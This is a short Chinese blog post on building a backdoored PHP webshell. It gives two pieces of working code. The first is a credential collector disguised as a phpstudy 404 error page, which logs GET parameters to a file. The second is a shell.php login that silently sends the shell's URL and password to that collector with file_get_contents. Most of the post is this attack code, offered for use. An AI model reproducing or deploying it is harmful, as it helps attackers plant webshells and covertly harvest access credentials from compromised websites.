PHP大马后门学习

使用户登录时候发送链接到后台服务器即可。简单逻辑代码实现如下：

一、收信箱子

<?php
	if(empty($_GET))
	{

	}else{
		$name = $_GET["name"];
		$name = $name."\r\n";
		$stream = fopen("box.txt", "a");
		fwrite($stream, $name);
		fclose($stream);
	}
	
?>	
<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="utf-8">
  <title>404 错误 - phpstudy</title>
  <meta name="keywords" content="">
  <meta name="description" content="">
  <meta name="renderer" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="apple-mobile-web-app-status-bar-style" content="black"> 
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="format-detection" content="telephone=no">
  <meta HTTP-EQUIV="pragma" CONTENT="no-cache"> 
  <meta HTTP-EQUIV="Cache-Control" CONTENT="no-store, must-revalidate"> 
  <meta HTTP-EQUIV="expires" CONTENT="Wed, 26 Feb 1997 08:21:57 GMT"> 
  <meta HTTP-EQUIV="expires" CONTENT="0">
  <style>
    body{
      font: 16px arial,'Microsoft Yahei','Hiragino Sans GB',sans-serif;
    }
    h1{
      margin: 0;
      color:#3a87ad;
      font-size: 26px;
    }
    .content{
      width: 45%;
      margin: 0 auto;
     
    }
    .content >div{
      margin-top: 50px;
      padding: 20px;
      background: #d9edf7;  
      border-radius: 12px;
    }
    .content dl{
      color: #2d6a88;
      line-height: 40px;
    } 
    .content div div {
      padding-bottom: 20px;
      text-align:center;
    }
  </style>
</head>
<body>
  <div class="content">
      <div>
           <h1>404 - Page Not Found 未找到</h1>
        <dl>
          <dt>错误说明：请求的页面不存在</dt>
          <dt>原因1：访问的文档权限不够</dt>
		  <dd>解决办法：</dd>
          <dd>修改文件权限为755，windos系统修改目录权限为可写可读。</dd>
          <dt>原因2：防火墙的原因</dt>
		  <dd>解决办法：</dd>
          <dd>先关闭让防火墙通过WWW服务。</dd>
		  <dt>原因3：站点根目录无默认访问文件</dt>
		  <dd>解决办法：</dd>
          <dd>在根目录中创建index.html或者创建index.php。</dd>
		  <dt>原因4：站点配置目录不正确</dt>
		  <dd>解决办法：</dd>
          <dd>将网站应用程序复制到站点目录中，或者修改站点配置目录指定到应用程序目录中。</dd>
		  <dt>原因5：站点使用了伪静态</dt>
		  <dd>解决办法：</dd>
          <dd>将伪静态规则删除，或者重新编写正确的伪静态规则，或关闭伪静态配置。</dd>
        </dl>
        <div>使用手册，视频教程，BUG反馈，官网地址： <a href="https://www.xp.cn"  target="_blank">www.xp.cn</a> </div>
    
      </div>
    </div> 
</body>
</html>

二、shell.php简单实现如下

<?php

header("Content-Type:text/html;charset=utf8");

$password = "admin";

if(empty($_POST)){
    echo '<form method="post" action="">';
    echo '<input type="password" name="pass" />';
    echo '<input type="submit" value="Login" />';
    echo '</form>';
}else{
    $pass = $_POST["pass"];
    if($pass == $password)
    {
        echo "欢迎Admin<br/>";
        $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"];
        $pass = $pass;
        $putUrl= "http://127.0.0.1/houmen.php?name=".$url."?pass=".$pass;
        #var_dump($putUrl);
        //var_dump($_SERVER);
        //发送httpget请求
        #echo $putUrl; 
        file_get_contents($putUrl);

    }else{
        unset($_POST);
        echo "密码错误";
    }
}

posted @ 2022-05-24 22:11 admax11 阅读(149) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

admax11

PHP大马后门学习

一、收信箱子

二、shell.php简单实现如下

公告